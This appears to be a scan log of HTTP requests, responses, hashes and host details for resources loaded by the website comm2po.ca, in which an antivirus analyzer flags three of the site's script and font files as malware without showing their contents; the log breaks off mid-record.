Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Thu, 30 Jul 2020 07:04:10 GMT
etag: "15410d5-1a21d-5aba3476e8e80-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 25214
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=7.4.4
72.167.59.18 200 OK 32 kB URL HTTP/2 www.comm2po.ca/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=7.4.4
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type Unicode text, UTF-8 text, with very long lines (34747), with NEL line terminators
Hash 21533efa45f62a5ab82242db0546d667
371a0d946d6a3cc00de832c7d57f7482d845bac6
3e924fada8f050a627bf232ac340977dd31fd4bd4f26eccae483b71221f25c52
Analyzer Verdict Alert fortinet Malware
GET /wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=7.4.4 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Thu, 19 Sep 2019 15:19:18 GMT
etag: "1581260-1833d-592e97a278980-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 32431
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 472 B IP 142.250.74.3:0
Hash c683e61e63df92799aa274fdac42cd3b
191aeec95861fa8596a90a10c60b22434431c033
898c007bc0e7d5f4d3180c9fe28b88036102ba64912d0773c023e1f4f07d7beb
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:40 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 472 B IP 142.250.74.3:0
Hash c683e61e63df92799aa274fdac42cd3b
191aeec95861fa8596a90a10c60b22434431c033
898c007bc0e7d5f4d3180c9fe28b88036102ba64912d0773c023e1f4f07d7beb
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:40 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
fonts.gstatic.com/s/raleway/v28/1Ptug8zYS_SKggPNyC0ITw.woff2
142.250.74.163 200 OK 46 kB URL HTTP/2 fonts.gstatic.com/s/raleway/v28/1Ptug8zYS_SKggPNyC0ITw.woff2
IP 142.250.74.163:0
File type Web Open Font Format (Version 2), TrueType, length 46524, version 1.0\012- data
Hash c1fd378f54921c75e4ae1821e7b8fff6
2ce96e97783b2f154d07f4464ca6f8eb2469f2c1
405ceee1c2f5c31f1cb94ebc63d49a43fddd1471c2c7401a01c7c11bb1d93826
GET /s/raleway/v28/1Ptug8zYS_SKggPNyC0ITw.woff2 HTTP/1.1
Host: fonts.gstatic.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: https://www.comm2po.ca
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 46524
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Mon, 19 Sep 2022 21:13:12 GMT
expires: Tue, 19 Sep 2023 21:13:12 GMT
cache-control: public, max-age=31536000
age: 112228
last-modified: Mon, 18 Jul 2022 19:58:01 GMT
content-type: font/woff2
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 472 B IP 142.250.74.3:0
Hash c683e61e63df92799aa274fdac42cd3b
191aeec95861fa8596a90a10c60b22434431c033
898c007bc0e7d5f4d3180c9fe28b88036102ba64912d0773c023e1f4f07d7beb
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:40 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
cdnjs.cloudflare.com/ajax/libs/animate.css/3.7.2/animate.min.css
104.17.25.14 200 OK 3.5 kB URL HTTP/2 cdnjs.cloudflare.com/ajax/libs/animate.css/3.7.2/animate.min.css
IP 104.17.25.14:0
File type ASCII text, with very long lines (57919)
Hash 4a8baa45fecbff51b8b9863b95788c9f
1dbc7f159b53fbd717d8cff486a39373d09aecfc
3a9ca2c9d6a36ce0283f1bc2502912ffb17c2acf9421d3b0ffd81a6be92b63af
GET /ajax/libs/animate.css/3.7.2/animate.min.css HTTP/1.1
Host: cdnjs.cloudflare.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
date: Wed, 21 Sep 2022 04:23:40 GMT
content-type: text/css; charset=utf-8
content-length: 3511
access-control-allow-origin: *
cache-control: public, max-age=30672000
content-encoding: br
etag: "5eb03d2a-e311"
last-modified: Mon, 04 May 2020 16:04:58 GMT
cf-cdnjs-via: cfworker/kv
cross-origin-resource-policy: cross-origin
timing-allow-origin: *
x-content-type-options: nosniff
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding
cf-cache-status: HIT
age: 9183701
expires: Mon, 11 Sep 2023 04:23:40 GMT
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5HwnUpInwR2DhkQN3NtEdmmnJFsDy6zUrQcG1TsE%2FFD4fxJXwOd5%2BaTXWaiI9AkG9x%2Bu8lar4RJkP6kDbOmShU4MUsQHQlZ3w2KcwG6Gzn%2FUf92Q1Mh807oZaqUzIVZMZauzaWen"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=15780000
server: cloudflare
cf-ray: 74e006ddcead0b31-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/themes/prodigy/assets/js/plugins.js?ver=1
72.167.59.18 200 OK 76 kB URL HTTP/2 www.comm2po.ca/wp-content/themes/prodigy/assets/js/plugins.js?ver=1
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type HTML document, ASCII text, with very long lines (20791), with CRLF line terminators
Hash e20c81ef266ab941bb6068cfb6eef535
c1568a7b98393a214ffee0eeccfc485808f250d1
508524393350975e2347fb0494e712083b7639a7b017eb2d05dcb02540471fce
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/prodigy/assets/js/plugins.js?ver=1 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 27 Jun 2017 22:58:56 GMT
etag: "13216e0-485c7-552f9031b2c00-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 75535
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/uploads/2019/02/web_design-300x282.png
72.167.59.18 200 OK 22 kB URL HTTP/2 www.comm2po.ca/wp-content/uploads/2019/02/web_design-300x282.png
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type PNG image data, 300 x 282, 8-bit/color RGBA, non-interlaced\012- data
Hash e22e46256648813012bb63a53ffd9bb9
4bf8fb06daa2eebaf3afa3384e0291e520e568e0
a1f7ca80fbd0abfd98b8d14637d4935b445a9315ee313f29051882c2ebac2409
GET /wp-content/uploads/2019/02/web_design-300x282.png HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 05 Feb 2019 18:53:09 GMT
etag: "1580beb-550e-5812a1ece4f40"
accept-ranges: bytes
content-length: 21774
content-type: image/png
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/uploads/2019/02/media_placement-300x282.png
72.167.59.18 200 OK 22 kB URL HTTP/2 www.comm2po.ca/wp-content/uploads/2019/02/media_placement-300x282.png
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type PNG image data, 300 x 282, 8-bit/color RGBA, non-interlaced\012- data
Hash 9f2b0fc228604379500263f62690a174
f9e62b173946a365178666ca604660dff2e74fed
608271e9a436922120de35c5b298bd9d2bcb7ecbfa9af82f4cc1e40165b0db75
GET /wp-content/uploads/2019/02/media_placement-300x282.png HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 05 Feb 2019 19:36:03 GMT
etag: "1580bd2-552f-5812ab83a6ec0"
accept-ranges: bytes
content-length: 21807
content-type: image/png
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
code.jquery.com/jquery-3.3.1.min.js
69.16.175.42 200 OK 30 kB URL HTTP/2 code.jquery.com/jquery-3.3.1.min.js
IP 69.16.175.42:0
File type ASCII text, with very long lines (65451)
Hash d549b312f7a7d228b4ec229a6547dfdc
0766794582ad530ec0f8c2595f741086afffa312
f6488b2915e0ceee723f4320492511d46c6ba1860d5975d085e6da8913f55f44
GET /jquery-3.3.1.min.js HTTP/1.1
Host: code.jquery.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
date: Wed, 21 Sep 2022 04:23:40 GMT
content-encoding: gzip
content-length: 30288
content-type: application/javascript; charset=utf-8
last-modified: Fri, 20 Aug 2021 17:47:53 GMT
accept-ranges: bytes
server: nginx
etag: W/"611feac9-1538f"
cache-control: max-age=315360000, public
access-control-allow-origin: *
vary: Accept-Encoding
x-hw: 1663734220.dop216.sk1.t,1663734220.cds261.sk1.hn,1663734220.cds072.sk1.c
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/uploads/2019/02/web_referencing-300x283.png
72.167.59.18 200 OK 26 kB URL HTTP/2 www.comm2po.ca/wp-content/uploads/2019/02/web_referencing-300x283.png
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type PNG image data, 300 x 283, 8-bit/color RGBA, non-interlaced\012- data
Hash 9af9167740170aab2bd9bd2a2f88633a
07444bb8a7c54c1a0cbd7ac75c20f855d1cfdbb4
126b0d0a5105a9d76147542db390b42addc3c38b2ef4e28ce754f1dabd15c88c
GET /wp-content/uploads/2019/02/web_referencing-300x283.png HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 05 Feb 2019 19:07:52 GMT
etag: "1580bf0-66f6-5812a536fd200"
accept-ranges: bytes
content-length: 26358
content-type: image/png
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/uploads/2019/02/social_media-300x283.png
72.167.59.18 200 OK 27 kB URL HTTP/2 www.comm2po.ca/wp-content/uploads/2019/02/social_media-300x283.png
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type PNG image data, 300 x 283, 8-bit/color RGBA, non-interlaced\012- data
Hash 767c584be252ecc6408d0925e7461679
2bc06cbdf9b58478d9894239414bc8b83ea245ed
61e2d035740871219e9211d97cd8c1c9a6feefe7874494cc8b7a105b72fe63a3
GET /wp-content/uploads/2019/02/social_media-300x283.png HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 05 Feb 2019 19:11:56 GMT
etag: "1580bd7-6a6d-5812a61faf700"
accept-ranges: bytes
content-length: 27245
content-type: image/png
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/uploads/2019/02/tailored_marketing-300x282.png
72.167.59.18 200 OK 28 kB URL HTTP/2 www.comm2po.ca/wp-content/uploads/2019/02/tailored_marketing-300x282.png
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type PNG image data, 300 x 282, 8-bit/color RGBA, non-interlaced\012- data
Hash 053988bf539dda80eb551fa6a4c9a466
2dba30ce57756eef71f3565089710d1815baae9a
95f1268026dc782f7bfa6366ee3e4ea1f2f76e1627a2d5fded0068a76a7a694b
GET /wp-content/uploads/2019/02/tailored_marketing-300x282.png HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 05 Feb 2019 19:13:56 GMT
etag: "1580bdc-6f3b-5812a69220500"
accept-ranges: bytes
content-length: 28475
content-type: image/png
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/uploads/2019/02/content_marketing-300x282.png
72.167.59.18 200 OK 29 kB URL HTTP/2 www.comm2po.ca/wp-content/uploads/2019/02/content_marketing-300x282.png
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type PNG image data, 300 x 282, 8-bit/color RGBA, non-interlaced\012- data
Hash 55b0a290f38f612b8b7e868a6ac3833c
86f26b8913388f4a619c4cbc0104ddec06911c45
52af0daa0574b01c993d7bd0fd73b0f3100299257ce5935f2d091fd78a8ea6f0
GET /wp-content/uploads/2019/02/content_marketing-300x282.png HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 05 Feb 2019 19:34:06 GMT
etag: "1580bc7-6fa2-5812ab1412780"
accept-ranges: bytes
content-length: 28578
content-type: image/png
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/uploads/2021/05/tcc-canada-513x401.jpg
72.167.59.18 200 OK 41 kB URL HTTP/2 www.comm2po.ca/wp-content/uploads/2021/05/tcc-canada-513x401.jpg
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 513x401, components 3\012- data
Hash 899e22b7e8367b307b1644eb63877c0f
e167d9881213b66e60d717893a009a4536706668
ed778febe3f4710c387f5bf8e4fdcd49e092bd1985d23d47cc1428d0f5dc306e
GET /wp-content/uploads/2021/05/tcc-canada-513x401.jpg HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Wed, 05 May 2021 14:42:35 GMT
etag: "1580e37-a0b3-5c19634952cc0"
accept-ranges: bytes
content-length: 41139
content-type: image/jpeg
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
cdn.polyfill.io/v2/polyfill.js?features=es5,es6,es2016,es2017,MutationObserver|gated&flags=gated&unknown=polyfill
151.101.85.26 200 OK 960 B URL HTTP/2 cdn.polyfill.io/v2/polyfill.js?features=es5,es6,es2016,es2017,MutationObserver|gated&flags=gated&unknown=polyfill
IP 151.101.85.26:0
File type ASCII text, with very long lines (3850)
Hash 5393d67797de9c9a89dad759ee65998d
fd875584a5f9a2ec7dc6550f62fa22934d3bd061
70556f7b92f7b7f9ab59034de485a62a6e5ea1b73f4720b6f406e98c8d24b95b
GET /v2/polyfill.js?features=es5,es6,es2016,es2017,MutationObserver|gated&flags=gated&unknown=polyfill HTTP/1.1
Host: cdn.polyfill.io
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
access-control-allow-origin: *
access-control-allow-methods: GET,HEAD,OPTIONS
cache-control: public, s-maxage=31536000, max-age=604800, stale-while-revalidate=604800, stale-if-error=604800
content-type: text/javascript; charset=utf-8
last-modified: Wed, 14 Sep 2022 15:11:15 GMT
content-encoding: br
age: 0
accept-ranges: bytes
useragent_normaliser: firefox/96.0.0
date: Wed, 21 Sep 2022 04:23:40 GMT
vary: User-Agent, Accept-Encoding
server-timing: cache-bma1657, PASS, fastly;desc="Edge time";dur=12
content-length: 960
X-Firefox-Spdy: h2
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 471 B IP 142.250.74.3:0
Hash 596ea0e7cffcb12819c214fd7e55e6b5
fdf581b35743d7693bf8c7f6154471a1b2646f06
a78eee2be3725b096407fde832e7762dad74ac69165f57a10b1ef76b5b2d9874
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:40 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
app.leadfox.co/css/leadfox.css
172.67.71.4 200 OK 43 kB URL HTTP/2 app.leadfox.co/css/leadfox.css
IP 172.67.71.4:0
Hash e6abc2faceaee6b31d9d9f6348ded7ff
9204b76a62b46fd56b56972a4d1b5dcdc46fd457
42a54cdea29116d8d1e6b8618caf0abba9fc5dc2a732a1c29627857681195c5e
GET /css/leadfox.css HTTP/1.1
Host: app.leadfox.co
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
date: Wed, 21 Sep 2022 04:23:40 GMT
content-type: text/css
last-modified: Tue, 20 Sep 2022 17:43:13 GMT
etag: W/"491-5e91f5cc18e40-gzip"
vary: Accept-Encoding
access-control-allow-origin:
x-kong-upstream-latency: 1
x-kong-proxy-latency: 0
via: kong/2.8.0
cf-cache-status: DYNAMIC
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=excdcjPp%2Fpn0LH9ne3grlGtflf7ddunCrZPPt4%2BJ7zK2OZ7g%2FzDn4cWT4BkcbMNwDWuMLZJCsrlXu8Q9ICNzpp8Q%2FdFabdhIfPOhg%2F34DlqwWUhZQ4Zf5e5fVdTYxgFv"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 74e006de8ab4b4f7-OSL
content-encoding: br
X-Firefox-Spdy: h2
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 471 B IP 142.250.74.3:0
Hash 596ea0e7cffcb12819c214fd7e55e6b5
fdf581b35743d7693bf8c7f6154471a1b2646f06
a78eee2be3725b096407fde832e7762dad74ac69165f57a10b1ef76b5b2d9874
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:40 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
www.comm2po.ca/wp-content/plugins/js_composer/assets/lib/bower/font-awesome/fonts/fontawesome-webfont.woff2?v=4.5.0
72.167.59.18 200 OK 67 kB URL HTTP/2 www.comm2po.ca/wp-content/plugins/js_composer/assets/lib/bower/font-awesome/fonts/fontawesome-webfont.woff2?v=4.5.0
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type Web Open Font Format (Version 2), TrueType, length 66624, version 4.262\012- data
Hash db812d8a70a4e88e888744c1c9a27e89
638c652d623280a58144f93e7b552c66d1667a11
ff82aeed6b9bb6701696c84d1b223d2e682eb78c89117a438ce6cfea8c498995
GET /wp-content/plugins/js_composer/assets/lib/bower/font-awesome/fonts/fontawesome-webfont.woff2?v=4.5.0 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Connection: keep-alive
Referer: https://www.comm2po.ca/wp-content/plugins/js_composer/assets/lib/bower/font-awesome/css/font-awesome.min.css?ver=4.12
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Fri, 05 Feb 2016 10:58:14 GMT
etag: "156037b-10440-52b03ba4c1d80"
accept-ranges: bytes
content-length: 66624
vary: Accept-Encoding
content-type: font/woff2
date: Wed, 21 Sep 2022 04:23:40 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/themes/prodigy/assets/fonts/et-line.woff
72.167.59.18 200 OK 55 kB URL HTTP/2 www.comm2po.ca/wp-content/themes/prodigy/assets/fonts/et-line.woff
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type Web Open Font Format, CFF, length 55220, version 1.0\012- data
Hash b01ff252761958325faab1535c90c87f
d33413e7bc42acc8837cc9030ca45d29c1ccf0c6
19d2f43d546ada73dd083f7778aa4a5cac1a8e7a3af56efccae580fce07a5e1c
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/prodigy/assets/fonts/et-line.woff HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Connection: keep-alive
Referer: https://www.comm2po.ca/wp-content/themes/prodigy/assets/css/et-line.css?ver=1.0
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 27 Jun 2017 22:58:56 GMT
etag: "12e1d15-d7b4-552f9031b2c00"
accept-ranges: bytes
content-length: 55220
vary: Accept-Encoding
content-type: font/woff
date: Wed, 21 Sep 2022 04:23:40 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/uploads/2021/04/Lyticainc-1-513x401.png
72.167.59.18 200 OK 228 kB URL HTTP/2 www.comm2po.ca/wp-content/uploads/2021/04/Lyticainc-1-513x401.png
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type PNG image data, 513 x 401, 8-bit/color RGBA, non-interlaced\012- data
Size 228 kB (227888 bytes)
Hash 9cde152a6750ad15b7d509cf7e2be2fa
3dd36be6f2c3394066d24c9841ade0a19c1dcab5
fad01e74d3003c5df6aa9561bd7046ef8696f8ead4aed6cec1cc4d84612d7741
GET /wp-content/uploads/2021/04/Lyticainc-1-513x401.png HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
